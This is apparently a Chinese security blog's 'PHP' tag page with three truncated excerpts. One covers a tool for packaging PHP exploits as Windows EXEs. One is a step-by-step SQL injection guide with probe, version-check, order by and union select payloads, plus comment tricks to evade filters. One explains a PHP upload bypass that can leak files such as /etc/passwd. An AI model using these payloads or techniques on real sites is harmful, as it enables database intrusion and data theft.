标签 ‘PHP’ 下的日志

Bambalam PHP EXE Compiler/Embedder

从一位叫 like 的朋友那里得知这个小工具的,然后去 google 了一下,就有了这篇日志。

Bambalam PHP EXE Compiler/Embedder 是一个小巧的命令行工具,能够把 php 脚本转换成 windows 的标准 exe 可执行文件,我们可以用他把那些 php 写的 exp 转换成 exe ,这样就不用再在 php 环境下运行 exp 了。

特点:
阅读全文 »

Tags: ,

php注入十点基本步骤

来源:Neeao

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,……./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from 阅读全文 »

Tags: , ,

PHP的is_uploaded_file()和move_uploaded_file()函数windows环境饶过缺陷

作者:剑心
来源:Loveshell

在早期的PHP版本中,上传文件很可能是通过如下的代码实现的:
......
if (isset($_FILES['file'])) {
$tmp_name = $_FILES['file']['tmp_name'];
}
if (file_exists($tmp_name)) {
copy($tmp_name,$destfile);
}
......

但是很可能会被伪造一个$_FILES['file']数组出来,如果tmp_name的内容会被指定为/etc/passwd等敏感信息的内容,那么很容易出现安全问题。PHP在后来的版本中用is_uploaded_file() 阅读全文 »

Tags: